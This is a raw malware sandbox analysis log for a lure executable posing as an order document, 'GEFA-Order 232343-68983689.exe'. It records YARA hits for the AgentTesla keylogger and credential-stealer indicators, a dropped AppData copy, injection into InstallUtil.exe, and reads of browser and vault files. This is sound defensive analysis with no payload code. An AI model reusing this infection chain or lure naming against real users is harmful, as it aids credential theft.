                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_063384103_2_06338410
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_0633C3873_2_0633C387
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_063300063_2_06330006
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_063300403_2_06330040
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_063412323_2_06341232
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_063409B83_2_063409B8
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_0637003E3_2_0637003E
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_063700403_2_06370040
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_06371C823_2_06371C82
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_0660D6B03_2_0660D6B0
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_065F00403_2_065F0040
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_065F00063_2_065F0006
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00DD41904_2_00DD4190
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00DD4A604_2_00DD4A60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00DD9C634_2_00DD9C63
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00DD3E484_2_00DD3E48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00DDCF284_2_00DDCF28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0551AD804_2_0551AD80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_055195344_2_05519534
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_0152CE7C7_2_0152CE7C
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06AEF3707_2_06AEF370
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06AE9D987_2_06AE9D98
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06AEA9807_2_06AEA980
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06AEF3607_2_06AEF360
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06AE91C97_2_06AE91C9
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06AE51D87_2_06AE51D8
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06AEA9717_2_06AEA971
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06B0C7887_2_06B0C788
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06B0D4D07_2_06B0D4D0
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06B0142C7_2_06B0142C
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06B000407_2_06B00040
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06B0C8347_2_06B0C834
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06B0B7B07_2_06B0B7B0
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06B0B7A17_2_06B0B7A1
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06B0C77B7_2_06B0C77B
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06B042907_2_06B04290
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06B0427F7_2_06B0427F
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06B030B17_2_06B030B1
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06B030BF7_2_06B030BF
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06B030C07_2_06B030C0
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06B060307_2_06B06030
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06B000067_2_06B00006
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06B0600D7_2_06B0600D
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06B0CA337_2_06B0CA33
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06C55F537_2_06C55F53
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06C55F607_2_06C55F60
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06C884207_2_06C88420
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06C8C0507_2_06C8C050
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06C88E617_2_06C88E61
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06C88E707_2_06C88E70
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06C884107_2_06C88410
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06C8C3877_2_06C8C387
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06C800407_2_06C80040
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06C800067_2_06C80006
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06CC1C827_2_06CC1C82
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06CC00407_2_06CC0040
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06CC00077_2_06CC0007
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06F5D6B07_2_06F5D6B0
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06F400407_2_06F40040
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06F400077_2_06F40007
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_03154A608_2_03154A60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_0315CF288_2_0315CF28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_03153E488_2_03153E48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_03159C688_2_03159C68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_031541908_2_03154190
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_0602AD808_2_0602AD80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_060295348_2_06029534
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1716960379.000000000342A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1716960379.000000000342A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameZigzwtwkov.exe6 vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004480000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename7dfcfdf2-d881-49c9-a39e-708aca656f85.exe4 vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAwndfiup.dll" vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1731922490.0000000006BE0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameAwndfiup.dll" vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000000.1657510996.0000000000F52000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameZigzwtwkov.exe6 vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1736166624.0000000006F60000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1716960379.00000000034E2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename7dfcfdf2-d881-49c9-a39e-708aca656f85.exe4 vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1735785966.0000000006E80000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1716960379.00000000032AA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1714806608.000000000161E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.000000000440A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004261000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAwndfiup.dll" vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004261000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe Binary or memory string: OriginalFilenameZigzwtwkov.exe6 vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: GEFA-Order 232343-68983689.exe, Lgfcbewc.cs Cryptographic APIs: 'CreateDecryptor'
                    Source: Cbgoomiexw.exe.0.dr, Lgfcbewc.cs Cryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.3475368.1.raw.unpack, Lgfcbewc.cs Cryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.raw.unpack, 4JJG6X.cs Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.raw.unpack, 8C78isHTVco.cs Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6f60000.11.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6f60000.11.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6f60000.11.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6f60000.11.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.440a100.7.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.440a100.7.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.43ba0e0.3.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.GEFA-Order 232343-68983689.exe.43ba0e0.3.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.GEFA-Order 232343-68983689.exe.440a100.7.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 0.2.GEFA-Order 232343-68983689.exe.43ba0e0.3.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6f60000.11.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6f60000.11.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6f60000.11.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.GEFA-Order 232343-68983689.exe.440a100.7.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.GEFA-Order 232343-68983689.exe.440a100.7.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6f60000.11.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.GEFA-Order 232343-68983689.exe.440a100.7.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.GEFA-Order 232343-68983689.exe.440a100.7.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.GEFA-Order 232343-68983689.exe.440a100.7.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6f60000.11.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.GEFA-Order 232343-68983689.exe.43ba0e0.3.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.GEFA-Order 232343-68983689.exe.43ba0e0.3.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 0.2.GEFA-Order 232343-68983689.exe.43ba0e0.3.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6f60000.11.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@9/2@2/2
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe File created: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: NULL
                    Source: GEFA-Order 232343-68983689.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: GEFA-Order 232343-68983689.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: GEFA-Order 232343-68983689.exe ReversingLabs: Detection: 15%
                    Source: GEFA-Order 232343-68983689.exe Virustotal: Detection: 26%
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe File read: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe
                    Source: unknown Process created: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe "C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe"
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: unknown Process created: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe "C:\Users\user\AppData\Roaming\Cbgoomiexw.exe"
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: unknown Process created: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe "C:\Users\user\AppData\Roaming\Cbgoomiexw.exe"
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: version.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: rasapi32.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: rasman.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: rtutils.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: mswsock.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: winhttp.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: iphlpapi.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: dhcpcsvc.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: dnsapi.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: winnsi.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: rasadhlp.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: secur32.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: schannel.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: mskeyprotect.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: ntasn1.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: ncrypt.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: ncryptsslp.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: profapi.dllJump to behavior
